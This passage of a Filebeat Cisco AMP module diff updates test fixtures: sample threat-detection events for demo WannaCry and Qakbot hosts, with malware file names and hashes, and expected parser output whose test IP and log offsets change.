+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json
index c0bf252bb53f..193e5474d913 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json
@@ -3,7 +3,7 @@
         "@timestamp": "2021-01-14T21:17:16.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -54,7 +54,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -66,7 +66,7 @@
         "@timestamp": "2021-01-14T20:38:26.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -100,7 +100,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 1313,
+        "log.offset": 1318,
         "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
         "related.hash": [
             "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
@@ -110,7 +110,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -122,7 +122,7 @@
         "@timestamp": "2021-01-14T20:18:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -156,7 +156,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 2612,
+        "log.offset": 2622,
         "related.hash": [
             "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
         ],
@@ -165,7 +165,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -177,7 +177,7 @@
         "@timestamp": "2021-01-14T20:18:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -211,7 +211,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 3794,
+        "log.offset": 3809,
         "related.hash": [
             "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
         ],
@@ -220,7 +220,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -232,7 +232,7 @@
         "@timestamp": "2021-01-14T20:18:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -271,7 +271,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 4969,
+        "log.offset": 4989,
         "process.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd",
         "process.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64",
         "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
@@ -285,7 +285,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -301,7 +301,7 @@
         "@timestamp": "2021-01-14T20:18:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -341,7 +341,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 6511,
+        "log.offset": 6536,
         "related.hash": [
             "b5ede95ec8bc4ad6984758be42b152bd",
             "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
@@ -352,7 +352,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -368,7 +368,7 @@
         "@timestamp": "2021-01-14T20:18:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -407,7 +407,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 7890,
+        "log.offset": 7920,
         "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
         "process.name": "28242311.exe",
         "process.pid": 4788,
@@ -419,7 +419,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -435,7 +435,7 @@
         "@timestamp": "2021-01-14T20:18:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -475,7 +475,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 9339,
+        "log.offset": 9374,
         "related.hash": [
             "b5ede95ec8bc4ad6984758be42b152bd",
             "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
@@ -486,7 +486,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -502,7 +502,7 @@
         "@timestamp": "2021-01-14T20:18:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -534,7 +534,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 10708,
+        "log.offset": 10748,
         "related.hash": [
             "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
         ],
@@ -543,7 +543,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -555,7 +555,7 @@
         "@timestamp": "2021-01-14T20:18:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -587,7 +587,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 11817,
+        "log.offset": 11862,
         "related.hash": [
             "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
         ],
@@ -596,7 +596,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -608,7 +608,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -642,7 +642,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 12926,
+        "log.offset": 12976,
         "related.hash": [
             "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
         ],
@@ -651,7 +651,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -663,7 +663,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -697,7 +697,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 14119,
+        "log.offset": 14174,
         "related.hash": [
             "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
         ],
@@ -706,7 +706,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -718,7 +718,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -752,7 +752,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 15312,
+        "log.offset": 15372,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -761,7 +761,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -773,7 +773,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -807,7 +807,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 16498,
+        "log.offset": 16563,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -816,7 +816,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -828,7 +828,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -862,7 +862,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 17684,
+        "log.offset": 17754,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -871,7 +871,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -883,7 +883,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -917,7 +917,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 18870,
+        "log.offset": 18945,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -926,7 +926,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -938,7 +938,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -972,7 +972,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 20056,
+        "log.offset": 20136,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -981,7 +981,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -993,7 +993,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1027,7 +1027,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 21242,
+        "log.offset": 21327,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1036,7 +1036,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1048,7 +1048,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1082,7 +1082,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 22428,
+        "log.offset": 22518,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1091,7 +1091,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1103,7 +1103,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1137,7 +1137,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 23614,
+        "log.offset": 23709,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1146,7 +1146,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1158,7 +1158,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
